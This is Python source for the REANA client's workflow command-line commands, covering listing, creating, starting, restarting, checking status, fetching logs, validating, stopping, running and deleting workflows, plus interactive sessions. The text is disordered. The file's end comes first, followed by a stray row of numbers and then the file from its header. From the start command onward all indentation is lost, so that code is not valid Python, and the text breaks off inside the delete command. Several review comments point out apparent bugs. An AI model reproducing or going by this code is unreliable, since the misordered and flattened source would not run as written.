                click.secho(
                    "{} Differences in workflow {}".format(leading_mark, section),
                    bold=True,
                    fg="yellow",
                )
                print_color_diff(content)
        click.echo("")  # Leave 1 line for separation
        # Workspace (file listing) differences, shown as a unified diff.
        workspace_diff = json.loads(response.get("workspace_listing"))
        if workspace_diff:
            workspace_diff = workspace_diff.splitlines()
            click.secho(
                "{} Differences in workflow workspace".format(leading_mark),
                bold=True,
                fg="yellow",
            )
            print_color_diff(workspace_diff)
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        click.echo(
            click.style(
                "Something went wrong when trying to get diff:\n{}".format(str(e)),
                fg="red",
            ),
            err=True,
        )
@click.group(help="Workspace interactive commands")
def interactive_group():
    """Workspace interactive commands."""
    # Pure command container: subcommands (open/close) are attached below.
@interactive_group.command("open")
@add_workflow_option
@click.argument(
    "interactive-session-type",
    metavar="interactive-session-type",
    default=INTERACTIVE_SESSION_TYPES[0],
    type=click.Choice(INTERACTIVE_SESSION_TYPES),
)
@click.option(
    "-i",
    "--image",
    help="Docker image which will be used to spawn the interactive session. "
    "Overrides the default image for the selected type.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_open_interactive_session(
    ctx, workflow, interactive_session_type, image, access_token
):  # noqa: D301
    """Open an interactive session inside the workspace.

    The `open` command allows to open interactive session processes on top of
    the workflow workspace, such as Jupyter notebooks. This is useful to
    quickly inspect and analyse the produced files while the workflow is stlil
    running.

    Examples:\n
    \t $ reana-client open -w myanalysis.42 jupyter
    """
    from reana_client.api.client import open_interactive_session

    # Guard clause: bail out early when no workflow was resolved.
    if not workflow:
        click.secho("Cannot find workflow {}".format(workflow), fg="red", err=True)
        return
    try:
        logging.info("Opening an interactive session on {}".format(workflow))
        session_config = {
            "image": image or None,
        }
        path = open_interactive_session(
            workflow,
            access_token,
            interactive_session_type,
            session_config,
        )
        session_uri = format_session_uri(
            reana_server_url=ctx.obj.reana_server_url,
            path=path,
            access_token=access_token,
        )
        click.secho(session_uri, fg="green")
        click.echo(
            "It could take several minutes to start the " "interactive session."
        )
    except Exception as err:
        logging.debug(traceback.format_exc())
        logging.debug(str(err))
        click.secho(
            "Interactive session could not be opened: \n{}".format(str(err)),
            fg="red",
            err=True,
        )
@interactive_group.command("close")
@add_workflow_option
@add_access_token_options
@check_connection
def workflow_close_interactive_session(workflow, access_token):  # noqa: D301
    """Close an interactive session.

    The `close` command allows to shut down any interactive sessions that you
    may have running. You would typically use this command after you finished
    exploring data in the Jupyter notebook and after you have transferred any
    code created in your interactive session.

    Examples:\n
    \t $ reana-client close -w myanalysis.42
    """
    from reana_client.api.client import close_interactive_session

    # Guard clause: bail out early when no workflow was resolved.
    if not workflow:
        click.secho("Cannot find workflow {} ".format(workflow), fg="red", err=True)
        return
    try:
        logging.info("Closing an interactive session on {}".format(workflow))
        close_interactive_session(workflow, access_token)
        click.echo(
            "Interactive session for workflow {}"
            " was successfully closed".format(workflow)
        )
    except Exception as err:
        logging.debug(traceback.format_exc())
        logging.debug(str(err))
        click.secho(
            "Interactive session could not be closed: \n{}".format(str(err)),
            fg="red",
            err=True,
        )
| 34.772429 | 193 | 0.592683 | # -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client workflow related commands."""
import json
import logging
import os
import sys
import time
import traceback
import click
from jsonschema.exceptions import ValidationError
from reana_commons.config import INTERACTIVE_SESSION_TYPES, REANA_COMPUTE_BACKENDS
from reana_commons.errors import REANAValidationError
from reana_commons.operational_options import validate_operational_options
from reana_commons.utils import click_table_printer
from reana_client.cli.files import get_files, upload_files
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
format_session_uri,
human_readable_or_raw_option,
key_value_to_dict,
parse_filter_parameters,
parse_format_parameters,
requires_environments,
validate_workflow_name,
get_formatted_progress,
)
from reana_client.config import ERROR_MESSAGES, RUN_STATUSES, TIMECHECK
from reana_client.printer import display_message
from reana_client.utils import (
get_reana_yaml_file_path,
get_workflow_name_and_run_number,
get_workflow_status_change_msg,
is_uuid_v4,
load_reana_spec,
validate_input_parameters,
workflow_uuid_or_name,
)
@click.group(help="Workflow management commands")
@click.pass_context
def workflow_management_group(ctx):
    """Top level wrapper for workflow management."""
    # Record which command group was entered, for debugging.
    group_name = ctx.info_name
    logging.debug(group_name)
@click.group(help="Workflow execution commands")
@click.pass_context
def workflow_execution_group(ctx):
    """Top level wrapper for execution related interaction."""
    # Record which command group was entered, for debugging.
    group_name = ctx.info_name
    logging.debug(group_name)
@workflow_management_group.command("list")
@click.option(
    "-s", "--sessions", is_flag=True, help="List all open interactive sessions."
)
@click.option(
    "--format",
    "_format",
    multiple=True,
    help="Format output according to column titles or column values. "
    "Use `<columm_name>=<column_value>` format. "
    "E.g. display workflow with failed status and named test_workflow "
    "`--format status=failed,name=test_workflow`.",
)
@click.option(
    "--json",
    "output_format",
    flag_value="json",
    default=None,
    help="Get output in JSON format.",
)
# NOTE(review): ``count=True`` with ``default=True`` makes ``show_all``
# truthy even when ``--all`` is absent, so deleted workflows are always
# shown — confirm whether the flag was meant to default to off.
@click.option(
    "--all",
    "show_all",
    count=True,
    default=True,
    help="Show all workflows including deleted ones.",
)
@click.option(
    "-v",
    "--verbose",
    count=True,
    help="Print out extra information: workflow id, user id, disk usage.",
)
@human_readable_or_raw_option
@click.option(
    "--sort",
    "sort_columm_name",
    default="CREATED",
    help="Sort the output by specified column",
)
@click.option(
    "--filter",
    "filters",
    multiple=True,
    help="Filter workflow that contains certain filtering criteria. "
    "Use `--filter <columm_name>=<column_value>` pairs. "
    "Available filters are `name` and `status`.",
)
@click.option(
    "--include-progress",
    "include_progress",
    is_flag=True,
    default=None,
    help="Include progress information of the workflows.",
)
@click.option(
    "--include-workspace-size",
    "include_workspace_size",
    is_flag=True,
    default=None,
    help="Include size information of the workspace.",
)
@add_access_token_options
@add_pagination_options
@check_connection
@click.pass_context
def workflow_workflows(  # noqa: C901
    ctx,
    sessions,
    _format,
    output_format,
    access_token,
    show_all,
    verbose,
    human_readable_or_raw,
    sort_columm_name,
    page,
    size,
    filters,
    include_progress,
    include_workspace_size,
):  # noqa: D301
    """List all workflows and sessions.

    The `list` command lists workflows and sessions. By default, the list of
    workflows is returned. If you would like to see the list of your open
    interactive sessions, you need to pass the `--sessions` command-line
    option.

    Example: \n
    \t $ reana-client list --all \n
    \t $ reana-client list --sessions \n
    \t $ reana-client list --verbose --bytes
    """
    import tablib

    from reana_client.api.client import get_workflows

    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    # ``type`` (shadows the builtin) selects which kind of entries to list.
    type = "interactive" if sessions else "batch"
    status_filter = None
    search_filter = None
    if filters:
        # Only ``name`` and ``status`` are accepted as filter keys.
        filter_names = ["name", "status"]
        status_filter, search_filter = parse_filter_parameters(filters, filter_names)
    if _format:
        parsed_format_filters = parse_format_parameters(_format)
    try:
        response = get_workflows(
            access_token,
            type,
            verbose=bool(verbose),
            page=page,
            size=size,
            status=status_filter,
            search=search_filter,
            include_progress=include_progress,
            include_workspace_size=include_workspace_size,
        )
        # Column sets: base headers per type, plus optional verbose /
        # size / progress columns appended below.
        verbose_headers = ["id", "user"]
        workspace_size_header = ["size"]
        progress_header = ["progress"]
        headers = {
            "batch": ["name", "run_number", "created", "started", "ended", "status"],
            "interactive": [
                "name",
                "run_number",
                "created",
                "session_type",
                "session_uri",
                "session_status",
            ],
        }
        if verbose:
            headers[type] += verbose_headers
        if verbose or include_workspace_size:
            headers[type] += workspace_size_header
        if verbose or include_progress:
            headers[type] += progress_header
        data = []
        for workflow in response:
            # Pick either the human-readable or the raw byte size.
            # NOTE(review): assumes every response entry carries a ``size``
            # mapping regardless of the verbosity flags — confirm with the
            # server API.
            workflow["size"] = workflow["size"][human_readable_or_raw]
            if workflow["status"] == "deleted" and not show_all:
                continue
            name, run_number = get_workflow_name_and_run_number(workflow["name"])
            workflow["name"] = name
            workflow["run_number"] = run_number
            if type == "interactive":
                workflow["session_uri"] = format_session_uri(
                    reana_server_url=ctx.obj.reana_server_url,
                    path=workflow["session_uri"],
                    access_token=access_token,
                )
            # Build one table row following the chosen header order.
            row = []
            for header in headers[type]:
                value = None
                if header in progress_header:
                    value = get_formatted_progress(workflow.get("progress"))
                elif header in ["started", "ended"]:
                    _key = (
                        "run_started_at" if header == "started" else "run_finished_at"
                    )
                    value = workflow.get("progress", {}).get(_key) or "-"
                if not value:
                    value = workflow.get(header)
                row.append(value)
            data.append(row)
        # Sort by the requested column (descending); default to "created".
        sort_column_id = 2
        if sort_columm_name.lower() in headers[type]:
            sort_column_id = headers[type].index(sort_columm_name.lower())
        data = sorted(data, key=lambda x: x[sort_column_id], reverse=True)
        # Mark the currently active (REANA_WORKON) workflow.
        workflow_ids = ["{0}.{1}".format(w[0], w[1]) for w in data]
        if os.getenv("REANA_WORKON", "") in workflow_ids:
            active_workflow_idx = workflow_ids.index(os.getenv("REANA_WORKON", ""))
            for idx, row in enumerate(data):
                if idx == active_workflow_idx:
                    # NOTE(review): the " *" marker is computed here but never
                    # written back into ``data``, so it does not appear in the
                    # output — looks like a lost assignment; confirm intent.
                    run_number = str(data[idx][headers[type].index("run_number")])
                    run_number += " *"
        tablib_data = tablib.Dataset()
        tablib_data.headers = headers[type]
        for row in data:
            tablib_data.append(row=row, tags=row)
        if _format:
            # Column/value filtering via ``--format`` returns dict rows.
            tablib_data, filtered_headers = format_data(
                parsed_format_filters, headers[type], tablib_data
            )
            if output_format:
                click.echo(json.dumps(tablib_data))
            else:
                tablib_data = [list(item.values()) for item in tablib_data]
                click_table_printer(filtered_headers, filtered_headers, tablib_data)
        else:
            if output_format:
                click.echo(tablib_data.export(output_format))
            else:
                click_table_printer(headers[type], _format, data)
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        click.echo(
            click.style(
                "Workflow list could not be retrieved: \n{}".format(str(e)), fg="red"
            ),
            err=True,
        )
@workflow_management_group.command("create")
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    default=get_reana_yaml_file_path,
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.option(
    "-n",
    "--name",
    "-w",
    "--workflow",
    default="",
    callback=validate_workflow_name,
    help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
    "--skip-validation",
    is_flag=True,
    help="If set, specifications file is not validated before "
    "submitting it's contents to REANA server.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_create(ctx, file, name, skip_validation, access_token):  # noqa: D301
    """Create a new workflow.

    The `create` command allows to create a new workflow from reana.yaml
    specifications file. The file is expected to be located in the current
    working directory, or supplied via command-line -f option, see examples
    below.

    Examples: \n
    \t $ reana-client create\n
    \t $ reana-client create -w myanalysis\n
    \t $ reana-client create -w myanalysis -f myreana.yaml\n
    """
    from reana_client.api.client import create_workflow
    from reana_client.utils import get_api_url

    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    # Check that name is not an UUIDv4.
    # Otherwise it would mess up `--workflow` flag usage because no distinction
    # could be made between the name and actual UUID of workflow.
    if is_uuid_v4(name):
        # NOTE(review): execution falls through to the creation attempt below;
        # presumably ``display_message`` aborts on ``msg_type="error"`` —
        # confirm, otherwise a ``sys.exit(1)`` is missing here.
        display_message("Workflow name cannot be a valid UUIDv4", msg_type="error")
    try:
        reana_specification = load_reana_spec(
            click.format_filename(file), skip_validation
        )
        logging.info("Connecting to {0}".format(get_api_url()))
        response = create_workflow(reana_specification, name, access_token)
        click.echo(click.style(response["workflow_name"], fg="green"))
        # check if command is called from wrapper command
        if "invoked_by_subcommand" in ctx.parent.__dict__:
            # Report the created name back to ``reana-client run``.
            ctx.parent.workflow_name = response["workflow_name"]
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        display_message(
            "Cannot create workflow {}: \n{}".format(name, str(e)), msg_type="error"
        )
        if "invoked_by_subcommand" in ctx.parent.__dict__:
            sys.exit(1)
@workflow_execution_group.command("start")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@click.pass_context
def workflow_start(
ctx, workflow, access_token, parameters, options, follow
): # noqa: D301
"""Start previously created workflow.
The `start` command allows to start previously created workflow. The
workflow execution can be further influenced by passing input prameters
using `-p` or `--parameters` flag and by setting additional operational
options using `-o` or `--options`. The input parameters and operational
options can be repetitive. For example, to disable caching for the Serial
workflow engine, you can set `-o CACHE=off`.
Examples: \n
\t $ reana-client start -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client start -w myanalysis.42 -p myparam1=myvalue1 -o CACHE=off
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {"input_parameters": parameters, "operational_options": options}
if workflow:
if parameters or options:
try:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
if follow:
while "running" in current_status:
time.sleep(TIMECHECK)
current_status = get_workflow_status(workflow, access_token).get(
"status"
)
click.secho(
get_workflow_status_change_msg(workflow, current_status),
fg="green",
)
if "finished" in current_status:
if follow:
click.secho(
"[INFO] Listing workflow output " "files...", bold=True
)
ctx.invoke(
get_files,
workflow=workflow,
access_token=access_token,
output_format="url",
)
sys.exit(0)
elif "failed" in current_status or "stopped" in current_status:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("restart")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.pass_context
def workflow_restart(
ctx, workflow, access_token, parameters, options, file
): # noqa: D301
"""Restart previously run workflow.
The `restart` command allows to restart a previous workflow on the same
workspace.
Note that workflow restarting can be used in a combination with operational
options ``FROM`` and ``TARGET``. You can also pass a modified workflow
specification with ``-f`` or `--file`` flag.
You can furthermore use modified input prameters using `-p` or
`--parameters` flag and by setting additional operational options using
`-o` or `--options`. The input parameters and operational options can be
repetitive.
Examples: \n
\t $ reana-client restart -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client restart -w myanalysis.42 -p myparam=myvalue\n
\t $ reana-client restart -w myanalysis.42 -o TARGET=gendata\n
\t $ reana-client restart -w myanalysis.42 -o FROM=fitdata
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {
"input_parameters": parameters,
"operational_options": options,
"restart": True,
}
if file:
parsed_parameters["reana_specification"] = load_reana_spec(
click.format_filename(file)
)
if workflow:
if parameters or options:
try:
if "reana_specification" in parsed_parameters:
workflow_type = parsed_parameters["reana_specification"][
"workflow"
]["type"]
original_parameters = (
parsed_parameters["reana_specification"]
.get("inputs", {})
.get("parameters", {})
)
else:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
parsed_parameters["operational_options"] = validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
workflow = response["workflow_name"] + "." + str(response["run_number"])
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("status")
@add_workflow_option
@click.option(
"--format",
"_format",
multiple=True,
help="Format output by displaying only certain columns. "
"E.g. --format name,status.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@add_access_token_options
@check_connection
@click.option("-v", "--verbose", count=True, help="Set status information verbosity.")
@click.pass_context
def workflow_status( # noqa: C901
ctx, workflow, _format, output_format, access_token, verbose
): # noqa: D301
"""Get status of a workflow.
The `status` command allow to retrieve status of a workflow. The status can
be created, queued, running, failed, etc. You can increase verbosity or
filter retrieved information by passing appropriate command-line options.
Examples: \n
\t $ reana-client status -w myanalysis.42 \n
\t $ reana-client status -w myanalysis.42 -v --json
"""
import tablib
from reana_client.api.client import get_workflow_status
def render_progress(finished_jobs, total_jobs):
if total_jobs:
return "{0}/{1}".format(finished_jobs, total_jobs)
else:
return "-/-"
def add_data_from_reponse(row, data, headers):
name, run_number = get_workflow_name_and_run_number(row["name"])
total_jobs = row["progress"].get("total")
if total_jobs:
total_jobs = total_jobs.get("total")
else:
total_jobs = 0
finished_jobs = row["progress"].get("finished")
if finished_jobs:
finished_jobs = finished_jobs.get("total")
else:
finished_jobs = 0
parsed_response = list(
map(str, [name, run_number, row["created"], row["status"]])
)
if row["progress"]["total"].get("total") or 0 > 0:
if "progress" not in headers:
headers += ["progress"]
parsed_response.append(render_progress(finished_jobs, total_jobs))
if row["status"] in ["running", "finished", "failed", "stopped"]:
started_at = row["progress"].get("run_started_at")
finished_at = row["progress"].get("run_finished_at")
if started_at:
after_created_pos = headers.index("created") + 1
headers.insert(after_created_pos, "started")
parsed_response.insert(after_created_pos, started_at)
if finished_at:
after_started_pos = headers.index("started") + 1
headers.insert(after_started_pos, "ended")
parsed_response.insert(after_started_pos, finished_at)
data.append(parsed_response)
return data
def add_verbose_data_from_response(response, verbose_headers, headers, data):
for k in verbose_headers:
if k == "command":
current_command = response["progress"]["current_command"]
if current_command:
if current_command.startswith('bash -c "cd '):
current_command = current_command[
current_command.index(";") + 2 : -2
]
data[-1] += [current_command]
else:
if "current_step_name" in response["progress"] and response[
"progress"
].get("current_step_name"):
current_step_name = response["progress"].get(
"current_step_name"
)
data[-1] += [current_step_name]
else:
headers.remove("command")
else:
data[-1] += [response.get(k)]
return data
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
if _format:
parsed_filters = parse_format_parameters(_format)
_format = [item["column_name"] for item in parsed_filters]
response = get_workflow_status(workflow, access_token)
headers = ["name", "run_number", "created", "status"]
verbose_headers = ["id", "user", "command"]
data = []
if not isinstance(response, list):
response = [response]
for workflow in response:
add_data_from_reponse(workflow, data, headers)
if verbose:
headers += verbose_headers
add_verbose_data_from_response(
workflow, verbose_headers, headers, data
)
if output_format:
tablib_data = tablib.Dataset()
tablib_data.headers = headers
for row in data:
tablib_data.append(row)
if _format:
tablib_data = tablib_data.subset(rows=None, cols=list(_format))
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers, _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the status of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("logs")
@add_workflow_option
@click.option("--json", "json_format", count=True, help="Get output in JSON format.")
@add_access_token_options
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter job logs to include only those steps that match certain filtering criteria. Use --filter name=value pairs. Available filters are compute_backend, docker_img, status and step.",
)
@add_pagination_options
@check_connection
@click.pass_context
def workflow_logs(
ctx,
workflow,
access_token,
json_format,
steps=None,
filters=None,
page=None,
size=None,
): # noqa: D301
"""Get workflow logs.
The `logs` command allows to retrieve logs of running workflow. Note that
only finished steps of the workflow are returned, the logs of the currently
processed step is not returned until it is finished.
Examples: \n
\t $ reana-client logs -w myanalysis.42
\t $ reana-client logs -w myanalysis.42 -s 1st_step
"""
from reana_client.api.client import get_workflow_logs
available_filters = {
"step": "job_name",
"compute_backend": "compute_backend",
"docker_img": "docker_img",
"status": "status",
}
steps = []
chosen_filters = dict()
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
if filters:
try:
for f in filters:
key, value = f.split("=")
if key not in available_filters:
click.echo(
click.style(
"Error: filter '{}' is not valid.\nAvailable filters are '{}'.".format(
key, "' '".join(sorted(available_filters.keys())),
),
fg="red",
),
err=True,
)
sys.exit(1)
elif key == "step":
steps.append(value)
else:
# Case insensitive for compute backends
if (
key == "compute_backend"
and value.lower() in REANA_COMPUTE_BACKENDS
):
value = REANA_COMPUTE_BACKENDS[value.lower()]
elif key == "status" and value not in RUN_STATUSES:
click.secho(
"==> ERROR: Input status value {} is not valid. ".format(
value
),
err=True,
fg="red",
),
sys.exit(1)
chosen_filters[key] = value
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Error: please provide complete --filter name=value pairs, for example --filter status=running.\nAvailable filters are '{}'.".format(
"' '".join(sorted(available_filters.keys()))
),
fg="red",
),
err=True,
)
sys.exit(1)
try:
response = get_workflow_logs(
workflow,
access_token,
steps=None if not steps else list(set(steps)),
page=page,
size=size,
)
workflow_logs = json.loads(response["logs"])
if filters:
for key, value in chosen_filters.items():
unwanted_steps = [
k
for k, v in workflow_logs["job_logs"].items()
if v[available_filters[key]] != value
]
for job_id in unwanted_steps:
del workflow_logs["job_logs"][job_id]
if json_format:
click.echo(json.dumps(workflow_logs, indent=2))
sys.exit(0)
else:
from reana_client.cli.utils import output_user_friendly_logs
output_user_friendly_logs(
workflow_logs, None if not steps else list(set(steps))
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the logs of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("validate")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"--environments",
is_flag=True,
default=False,
help="If set, check all runtime environments specified in REANA "
"specification file. [default=False]",
)
@click.option(
"--pull",
is_flag=True,
default=False,
callback=requires_environments,
help="If set, try to pull remote environment image from registry to perform "
"validation locally. Requires ``--environments`` flag. [default=False]",
)
@click.pass_context
def workflow_validate(ctx, file, environments, pull): # noqa: D301
"""Validate workflow specification file.
The `validate` command allows to check syntax and validate the reana.yaml
workflow specification file.
Examples: \n
\t $ reana-client validate -f reana.yaml
"""
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
try:
load_reana_spec(
click.format_filename(file),
skip_validate_environments=not environments,
pull_environment_image=pull,
)
except (ValidationError, REANAValidationError) as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"{0} is not a valid REANA specification:\n{1}".format(
click.format_filename(file), e.message
),
msg_type="error",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong when trying to validate {}".format(file),
msg_type="error",
)
@workflow_execution_group.command("stop")
@click.option(
"--force",
"force_stop",
is_flag=True,
default=False,
help="Stop a workflow without waiting for jobs to finish.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_stop(ctx, workflow, force_stop, access_token): # noqa: D301
"""Stop a running workflow.
The `stop` command allows to hard-stop the running workflow process. Note
that soft-stopping of the workflow is currently not supported. This command
should be therefore used with care, only if you are absolutely sure that
there is no point in continuing the running the workflow.
Example: \n
\t $ reana-client stop -w myanalysis.42 --force
"""
from reana_client.api.client import get_workflow_status, stop_workflow
if not force_stop:
click.secho(
"Graceful stop not implement yet. If you really want to "
"stop your workflow without waiting for jobs to finish"
" use: --force option",
fg="red",
)
raise click.Abort()
if workflow:
try:
logging.info("Sending a request to stop workflow {}".format(workflow))
stop_workflow(workflow, force_stop, access_token)
click.secho(get_workflow_status_change_msg(workflow, "stopped"), fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Cannot stop workflow {}: \n{}".format(workflow, str(e)),
fg="red",
err=True,
)
@workflow_execution_group.command("run")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off.",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_run(
ctx, file, name, skip_validation, access_token, parameters, options, follow
): # noqa: D301
"""Shortcut to create, upload, start a new workflow.
The `run` command allows to create a new workflow, upload its input files
and start it in one command.
Examples: \n
\t $ reana-client run -w myanalysis-test-small -p myparam=mysmallvalue \n
\t $ reana-client run -w myanalysis-test-big -p myparam=mybigvalue
"""
# set context parameters for subcommand
ctx.invoked_by_subcommand = True
ctx.workflow_name = ""
click.secho("[INFO] Creating a workflow...", bold=True)
ctx.invoke(
workflow_create,
file=file,
name=name,
skip_validation=skip_validation,
access_token=access_token,
)
click.secho("[INFO] Uploading files...", bold=True)
ctx.invoke(
upload_files,
workflow=ctx.workflow_name,
filenames=None,
access_token=access_token,
)
click.secho("[INFO] Starting workflow...", bold=True)
ctx.invoke(
workflow_start,
workflow=ctx.workflow_name,
access_token=access_token,
parameters=parameters,
options=options,
follow=follow,
)
@workflow_management_group.command("delete")
@click.option(
"--include-all-runs",
"all_runs",
is_flag=True,
help="Delete all runs of a given workflow.",
)
@click.option(
"--include-workspace",
"workspace",
is_flag=True,
help="Delete workspace from REANA.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_delete(ctx, workflow, all_runs, workspace, access_token): # noqa: D301
"""Delete a workflow.
The `delete` command allows to remove workflow runs from the database and
the workspace. By default, the command removes the workflow and all its
cached information and hides the workflow from the workflow list. Note that
workflow workspace will still be accessible until you use
`--include-workspace` flag. Note also that you can remove all past runs of
a workflow by specifying `--include-all-runs` flag.
Example: \n
\t $ reana-client delete -w myanalysis.42 \n
\t $ reana-client delete -w myanalysis.42 --include-all-runs \n
\t $ reana-client delete -w myanalysis.42 --include-workspace
"""
from reana_client.api.client import delete_workflow, get_workflow_status
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
logging.info("Connecting to {0}".format(get_api_url()))
delete_workflow(workflow, all_runs, workspace, access_token)
if all_runs:
message = "All workflows named '{}' have been deleted.".format(
workflow.split(".")[0]
)
else:
message = get_workflow_status_change_msg(workflow, "deleted")
click.secho(message, fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
